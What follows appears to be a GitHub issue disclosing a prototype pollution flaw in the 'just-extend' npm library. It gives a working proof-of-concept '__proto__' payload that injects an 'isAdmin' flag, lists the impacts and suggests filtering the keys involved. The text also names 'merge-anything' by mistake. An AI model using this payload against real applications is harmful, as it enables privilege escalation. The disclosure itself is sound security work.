Open
Description
POC:
import extend from 'just-extend';
const defaultPermissions = {
read: true,
write: false,
delete: false,
};
const payload = JSON.parse('{"__proto__": { "isAdmin": true }}');
const userPermissions = extend({}, defaultPermissions, payload);
console.log('User Permissions:', userPermissions);
console.log(userPermissions['isAdmin'])
if (userPermissions.isAdmin) {
console.log('User has admin access');
} else {
console.log('User does not have admin access');
}
This code demonstrates how prototype poisoning can occur by merging an object containing a proto property with default permissions using the merge-anything library. The isAdmin property is injected into the object's prototype.
- Unauthorized Access: Users can gain elevated permissions without proper authorization.
- Security Breach: Compromised data integrity and potential for privilege escalation.
- Inconsistent Behavior: Application logic relying on permissions can be bypassed, leading to unpredictable behavior and security vulnerabilities.
Mitigation
- Specifically check for keys like "proto", "prototype", "constructor"
Since this library has a lot of weekly downloads so there might multiple use cases that might be effected by this bug
Metadata
Metadata
Assignees
Labels
No labels